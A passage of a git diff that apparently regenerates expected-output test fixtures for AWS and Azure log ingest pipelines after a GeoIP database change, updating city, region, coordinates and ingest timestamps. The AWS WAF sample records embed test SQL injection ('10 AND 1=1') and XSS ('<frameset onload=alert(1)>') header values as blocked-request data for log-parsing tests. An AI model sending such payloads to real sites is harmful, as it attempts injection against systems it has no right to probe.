"SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -31,38 +50,8 @@ "ip": "89.160.20.156", "packets": 8 }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:dF5WY79X1yVncj+yH8q27Q5Bnpk=", - "transport": "tcp", - "type": "ipv4", - "bytes": 568, - "iana_number": "6", - "packets": 8 - }, - "cloud": { - "provider": "aws", - "account": { - "id": "123456789010" - }, - "instance": { - "id": "i-01234567890123456" - } - }, - "@timestamp": "2019-08-26T19:48:53.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "89.160.20.156", - "10.0.0.62" - ] - }, "event": { - "ingested": "2021-12-09T16:12:01.346119700Z", + "ingested": "2021-12-14T14:35:32.115689868Z", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 89.160.20.156 10.0.0.62 43416 5001 89.160.20.156 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK", "kind": "event", "start": "2019-08-26T19:47:55.000Z", @@ -89,6 +78,17 @@ "action": "ACCEPT", "pkt_dstaddr": "10.0.0.62" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:dF5WY79X1yVncj+yH8q27Q5Bnpk=", + "transport": "tcp", + "type": "ipv4", + "bytes": 568, + "iana_number": "6", + "packets": 8 } }, { @@ -106,7 +106,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:12:01.346125500Z", + "ingested": "2021-12-14T14:35:32.115692841Z", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - SKIPDATA", "kind": "event", "start": "2019-08-26T19:47:55.000Z", @@ -144,7 +144,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:12:01.346129200Z", + "ingested": "2021-12-14T14:35:32.115693276Z", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - NODATA", "kind": "event", "start": "2019-08-26T19:47:55.000Z", diff --git a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json index b2240aa9ada..ec3d4eefb87 100644 --- a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json +++ b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json @@ -8,14 +8,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -63,7 +63,7 @@ }, "event": { "action": "BLOCK", - "ingested": "2021-12-09T16:12:01.711621Z", + "ingested": "2021-12-14T14:35:32.433994951Z", "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:EXAMPLE12345:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"AU\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"x-stm-test\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ @@ -106,14 +106,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -161,7 +161,7 @@ }, "event": { "action": "ALLOW", - "ingested": "2021-12-09T16:12:01.711626900Z", + "ingested": "2021-12-14T14:35:32.433997291Z", "original": "{\"timestamp\":1592357192516,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"Default_Action\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"ALLOW\",\"terminatingRuleMatchDetails\":[],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[{\"ruleId\":\"TestRule\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"foo\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ @@ -210,14 +210,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -265,7 +265,7 @@ }, "event": { "action": "BLOCK", - "ingested": "2021-12-09T16:12:01.711632900Z", + "ingested": "2021-12-14T14:35:32.433997675Z", "original": "{\"timestamp\":1592361810888,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"RG-Reference\",\"terminatingRuleType\":\"GROUP\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"XSS\",\"location\":\"HEADER\",\"matchedData\":[\"\u003c\",\"frameset\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[{\"ruleGroupId\":\"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b\",\"terminatingRule\":{\"ruleId\":\"RuleA-XSS\",\"action\":\"BLOCK\",\"ruleMatchDetails\":null},\"nonTerminatingMatchingRules\":[{\"ruleId\":\"RuleB-SQLi\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"excludedRules\":null}],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"xssfoo\",\"value\":\"\u003cframeset onload=alert(1)\u003e\"},{\"name\":\"bar\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ @@ -327,38 +327,6 @@ } }, { - "rule": { - "ruleset": "REGULAR", - "id": "STMTest_SQLi_XSS" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Stockholm", - "location": { - "lon": 17.8167, - "lat": 59.2 - } - }, - "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } - }, - "ip": "89.160.20.156" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "http", - "transport": "tcp" - }, "cloud": { "region": "ap-southeast-2", "provider": "aws", @@ -377,6 +345,10 @@ "89.160.20.156" ] }, + "rule": { + "ruleset": "REGULAR", + "id": "STMTest_SQLi_XSS" + }, "http": { "request": { "method": "POST", @@ -384,9 +356,30 @@ }, "version": "1.1" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "ip": "89.160.20.156" + }, "event": { "action": "BLOCK", - "ingested": "2021-12-09T16:12:01.711639Z", + "ingested": "2021-12-14T14:35:32.433998095Z", "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"UNKNOWN\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"ALB\",\"httpSourceId\":\"alb\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"requestHeadersInserted\":null,\"responseCodeSent\":null,\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"AU\",\"headers\":[],\"uri\":\"\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"POST\",\"requestId\":\"null\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ @@ -415,6 +408,13 @@ }, "arn": "arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "http", + "transport": "tcp" } } ] diff --git a/packages/aws/data_stream/waf/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/waf/elasticsearch/ingest_pipeline/default.yml index 79bcd949ca5..ca4b82ad260 100644 --- a/packages/aws/data_stream/waf/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/waf/elasticsearch/ingest_pipeline/default.yml @@ -38,7 +38,7 @@ processors: field: json.httpRequest.country target_field: source.geo.country_iso_code ignore_missing: true - if: ctx.source?.geo.country_iso_code == null + if: ctx.source?.geo?.country_iso_code == null - geoip: database_file: GeoLite2-ASN.mmdb field: source.ip diff --git a/packages/aws/manifest.yml b/packages/aws/manifest.yml index 9f0ddd23134..5e1fc0591f4 100644 --- a/packages/aws/manifest.yml +++ b/packages/aws/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: aws title: AWS -version: 1.7.0 +version: 1.7.1 license: basic description: Collect logs and metrics from Amazon Web Services with Elastic Agent. type: integration diff --git a/packages/azure/changelog.yml b/packages/azure/changelog.yml index 78e15e8ce5f..356150b69d7 100644 --- a/packages/azure/changelog.yml +++ b/packages/azure/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.12.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.12.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json index 3807df486fa..e54a74f31cc 100644 --- a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json +++ b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json @@ -13,7 +13,7 @@ }, "event": { "action": "Microsoft.Resourcehealth/healthevent/Updated/action", - "ingested": "2021-12-09T13:30:56.909152600Z", + "ingested": "2021-12-14T14:35:43.079282922Z", "original": "{\"category\":\"ResourceHealth\",\"correlationId\":\"1c867fe2-050c-4a74-bb1c-a83b15246fdd\",\"level\":\"Information\",\"operationName\":\"Microsoft.Resourcehealth/healthevent/Updated/action\",\"properties\":{\"eventCategory\":\"ResourceHealth\",\"eventProperties\":{\"cause\":\"PlatformInitiated\"}},\"resourceId\":\"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.domainRegistration\",\"resultType\":\"Updated\",\"time\":\"2021-05-25T22:04:07.22Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json index 14d6f56a662..7b0575e2f5f 100644 --- a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json +++ b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json @@ -7,20 +7,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "ip": "81.2.69.144" @@ -30,14 +24,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 + "lon": -0.0931, + "lat": 51.5142 } }, "cloud": { @@ -58,7 +52,7 @@ "event": { "duration": 0, "action": "MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION", - "ingested": "2021-12-09T13:30:56.983745700Z", + "ingested": "2021-12-14T14:35:43.155209455Z", "original": "{\"callerIpAddress\":\"81.2.69.144\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}", "type": [ "change" diff --git a/packages/azure/data_stream/activitylogs/fields/ecs.yml b/packages/azure/data_stream/activitylogs/fields/ecs.yml index 1839a0db982..3ec824a0dee 100644 --- a/packages/azure/data_stream/activitylogs/fields/ecs.yml +++ b/packages/azure/data_stream/activitylogs/fields/ecs.yml @@ -74,6 +74,8 @@ external: ecs - name: geo.region_name external: ecs +- name: geo.name + external: ecs - name: geo.region_iso_code external: ecs - name: log.level diff --git a/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json b/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json index cf3e1022d17..809dba919ca 100644 --- a/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json +++ b/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json @@ -14,7 +14,7 @@ "event": { "duration": 0, "action": "Update device", - "ingested": "2021-12-09T13:30:57.501235200Z", + "ingested": "2021-12-14T14:35:43.558271296Z", "original": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":\"id\",\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":\"Core\"}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":\"\"}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "kind": "event", "outcome": "success" diff --git a/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json b/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json index bf1e67974ba..cc23f06480d 100644 --- a/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json +++ b/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json @@ -1,14 +1,14 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":\"id\",\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":\"Core\"}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":\"\"}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "event": { - "ingested": "2021-12-09T13:30:57.966322200Z", + "ingested": "2021-12-14T14:35:43.988896537Z", "kind": "event" }, + "ecs": { + "version": "1.12.0" + }, "tags": [ "preserve_original_event" ] diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json index 17cd84347c1..a6f73e4b7fc 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "ApplicationGatewayAccess", - "ingested": "2021-12-09T13:30:58.364774600Z", + "ingested": "2021-12-14T14:35:44.368671668Z", "original": "{ \"resourceId\": \"/SUBSCRIPTIONS/SUBSCRIPTION/RESOURCEGROUPS/ET-AZURE-INTEGRATION-TESTING/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/LANGERGATEWAY\", \"operationName\": \"ApplicationGatewayAccess\", \"time\": \"2020-10-11T20:30:59Z\", \"category\": \"ApplicationGatewayAccessLog\", \"properties\": {\"instanceId\":\"ApplicationGatewayRole_IN_1\",\"clientIP\":\"172.105.13.165\",\"clientPort\":18234,\"httpMethod\":\"GET\",\"requestUri\":\"/nmaplowercheck1602448229\",\"requestQuery\":\"X-AzureApplicationGateway-CACHE-HIT=0\",\"userAgent\":\"Mozilla/5.0\",\"httpStatus\":502,\"httpVersion\":\"HTTP/1.1\",\"receivedBytes\":108,\"sentBytes\":1636,\"timeTaken\":78,\"sslEnabled\":\"off\",\"host\":\"IP\",\"originalHost\":\"IP\"}},{ \"resourceId\": \"/SUBSCRIPTIONS/SUBSCRIPTION/RESOURCEGROUPS/ET-AZURE-INTEGRATION-TESTING/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/LANGERGATEWAY\", \"operationName\": \"ApplicationGatewayAccess\", \"time\": \"2020-10-11T20:30:59Z\", \"category\": \"ApplicationGatewayAccessLog\", \"properties\": {\"instanceId\":\"ApplicationGatewayRole_IN_1\",\"clientIP\":\"172.105.13.165\",\"clientPort\":18706,\"httpMethod\":\"GET\",\"requestUri\":\"/evox/about\",\"requestQuery\":\"X-AzureApplicationGateway-CACHE-HIT=0\",\"userAgent\":\"Mozilla/5.0\",\"httpStatus\":502,\"httpVersion\":\"HTTP/1.1\",\"receivedBytes\":94,\"sentBytes\":1636,\"timeTaken\":62,\"sslEnabled\":\"off\",\"host\":\"IP\",\"originalHost\":\"IP\"}}]}", "kind": "event" }, diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json index 992b7187041..86c17a63472 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "Microsoft.ContainerService/managedClusters/diagnosticLogs/Read", - "ingested": "2021-12-09T13:30:58.413839200Z", + "ingested": "2021-12-14T14:35:44.421779579Z", "original": "{\"Cloud\":\"AzureCloud\",\"Environment\":\"prod\",\"category\":\"kube-audit\",\"ccpNamespace\":\"5e4bf4baee195b00017cdbfa\",\"operationName\":\"Microsoft.ContainerService/managedClusters/diagnosticLogs/Read\",\"properties\":{\"log\":\"{\\\"kind\\\":\\\"Event\\\"}\",\"pod\":\"kube-apiserver-666bd4b459-hjgdc\"},\"resourceId\":\"/SUBSCRIPTIONS/70BD6E77-4B1E-4835-8896-DB77B8EEF364/RESOURCEGROUPS/OBS-INFRASTRUCTURE/PROVIDERS/MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/OBSKUBE\",\"time\":\"2020-11-09T10:57:31.0000000Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json index 7b7dd9ec56c..afdc2512e8d 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json @@ -11,7 +11,7 @@ }, "event": { "action": "Retreive ConsumerGroup", - "ingested": "2021-12-09T13:30:58.470556500Z", + "ingested": "2021-12-14T14:35:44.477324350Z", "original": "{\"ActivityId\":\"30ed877c-a36b-491a-bd4d-ddd847fe55b8\",\"Caller\":\"Portal\",\"Environment\":\"PROD\",\"EventName\":\"Retreive ConsumerGroup\",\"EventProperties\":\"{\\\"SubscriptionId\\\":\\\"7657426d-c4c3-44ac-88a2-3b2cd59e6dba\\\",\\\"Namespace\\\":\\\"obstesteventhubs\\\",\\\"Via\\\":\\\"sb://obstesteventhubs.servicebus.windows.net/insights-logs-operationallogs/consumergroups?api-version=2017-04\\u0026$skip=0\\u0026$top=100\\\",\\\"TrackingId\\\":\\\"30ed877c-a36b-491a-bd4d-ddd847fe55b8_M2CH3_M2CH3_G3S2\\\"}\",\"EventTimeString\":\"11/3/2020 9:06:42 AM +00:00\",\"Region\":\"West Europe\",\"ScaleUnit\":\"PROD-AM3-AZ501\",\"Status\":\"Succeeded\",\"category\":\"OperationalLogs\",\"resourceId\":\"/SUBSCRIPTIONS/7657426D-C4C3-44AC-88A2-3B2CD59E6DBA/RESOURCEGROUPS/OBS-TEST/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/OBSTESTEVENTHUBS\"}", "kind": "event", "outcome": "succeeded" @@ -56,7 +56,7 @@ }, "event": { "action": "Retreive ConsumerGroup", - "ingested": "2021-12-09T13:30:58.470564700Z", + "ingested": "2021-12-14T14:35:44.477326822Z", "original": "{\"ActivityId\":\"30ed877c-a36b-491a-bd4d-ddd847fe55b8\",\"Caller\":\"Portal\",\"Environment\":\"PROD\",\"EventName\":\"Retreive ConsumerGroup\",\"EventProperties\":\"{\\\"SubscriptionId\\\":\\\"7657426d-c4c3-44ac-88a2-3b2cd59e6dba\\\",\\\"Namespace\\\":\\\"obstesteventhubs\\\"}\",\"EventTimeString\":\"11/3/2020 9:06:42 AM +00:00\",\"Region\":\"West Europe\",\"ScaleUnit\":\"PROD-AM3-AZ501\",\"Status\":\"Succeeded\",\"category\":\"OperationalLogs\",\"resourceId\":\"/SUBSCRIPTIONS/7657426D-C4C3-44AC-88A2-3B2CD59E6DBA/RESOURCEGROUPS/OBS-TEST/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/OBSTESTEVENTHUBS\"}", "kind": "event", "outcome": "succeeded" diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json index 25ab37c8c0a..f8bcb635241 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "Microsoft.ContainerService/managedClusters/diagnosticLogs/Read", - "ingested": "2021-12-09T13:30:58.573546900Z", + "ingested": "2021-12-14T14:35:44.571614650Z", "original": 